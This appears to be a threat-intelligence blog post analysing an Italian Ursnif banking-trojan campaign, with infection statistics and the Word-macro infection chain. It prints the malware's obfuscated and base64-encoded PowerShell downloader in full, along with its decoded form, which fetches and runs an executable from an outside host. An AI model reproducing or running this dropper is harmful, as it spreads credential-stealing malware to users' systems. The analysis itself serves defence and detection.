Ursnif — attacks in Italy

Ursnif is a Banking Trojan malware designed to maintain system access and steal user credentials through keylogging functionality.

The campaign identified and analysed represents the second wave of Ursnif attacks in November (YER, root folder of the distribution system). We tracked 775 Italian systems compromised, representing 46% of the total:

Infections Italy and Worldwide

Our research and analysis operations enabled us to obtain further details regarding systems compromised by Ursnif malware. The following represents the distribution of infections globally. Particularly noteworthy is that Italy represents a significant target for the criminal group deploying Ursnif malware.

Distribution of infections in Italy highlighting the most affected provinces.

The following images display details of Italian compromises. On one side, the list of Internet Service Providers to which devices with the highest number of infections are connected. On the left image, the list of primary IP addresses of compromised systems.

The Infection Process

The system infection chain is now well-established: malicious emails containing Office suite documents, in this case Word, either as attachments or downloadable links. The malicious document contains a Macro that, if enabled, executes a series of system commands for compromise.

Executed Commands

The Word document does not contain the malware but acts as a downloader. It handles download and execution of the malware:

Step 1 (obfuscated cmd command):

cMd.EXE /c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^u^A^G^k^A^b^g^B^h^A^H^M^A^d^Q^B^r^A^G^E^A^c^w^B^o^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^Z^A^E^U^A^U^g^A^v^A^H^A^A^Z^Q^B^s^A^G^k^A^b^Q^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^H^U^A^b^A^B^v^A^G^Y^A^M^g^A^u^A^H^c^A^b^w^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^3^A^D^g^A^M^w^A^2^A^D^A^A^M^Q^B^l^A^D^g^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^c^A^O^A^A^z^A^D^Y^A^M^A^A^x^A^G^U^A^O^A^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^E^U^A^e^A^B^p^A^H^Q^A

Step 2 (Powershell command):

cMd.EXE /c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBuAGkAbgBhAHMAdQBrAGEAcwBoAC4AYwBvAG0ALwBZAEUAUgAvAHAAZQBsAGkAbQAuAHAAaABwAD8AbAA9AHUAbABvAGYAMgAuAHcAbwBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAA3ADgAMwA2ADAAMQBlADgALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADcAOAAzADYAMAAxAGUAOAAuAGUAeABlACcAOwAgAEUAeABpAHQA

Step 3 (Base64 command decoding):

(New-Object System Net WebClient) DownloadFile(“http://ninasukash com/YER/pelim php?l=ulof2 wos”, $env:APPDATA + ‘\783601e8 exe’);Start-Process $env:APPDATA’\783601e8 exe’; Exit

The URSNIF Malware

The extracted Powershell command proceeds to download the Ursnif malware from the internet site ninasukash[.]com. Our Cyber Threat Intelligence operations have identified this infrastructure as a persistent distribution vector for this Banking Trojan family.

{DownloadFile(“http://ninasukash com/YER/pelim php?l=ulof2 wos”, $env:APPDATA + ‘\783601e8 exe’); }

and then immediately executed by the command portion:

{ Start-Process $env:APPDATA’\783601e8 exe } .

Further technical details are available in the second part of this analysis. The infection chain observed—macro-enabled Office documents, obfuscated command execution, and multi-stage payload delivery—remains a persistent attack vector requiring endpoint detection and response capabilities to identify and contain Banking Trojan infections at scale.